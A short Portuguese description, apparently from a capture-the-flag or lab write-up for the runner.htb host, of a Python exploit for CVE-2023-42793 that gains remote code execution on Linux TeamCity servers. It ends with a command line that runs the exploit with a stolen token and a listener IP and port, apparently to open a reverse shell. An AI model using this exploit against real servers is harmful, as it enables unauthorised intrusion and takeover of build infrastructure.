
Exploit em Python para CVE-2023-42793 que alcança execução remota de código em servidores TeamCity Linux ao codificar um payload em uma URL e enviá-lo ao alvo.
Você precisará obter o token primeiro usando um exploit diferente. No entanto, o exploit a seguir permitirá que você obtenha RCE no servidor Linux, pois ele codifica o payload na URL e o envia ao servidor.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT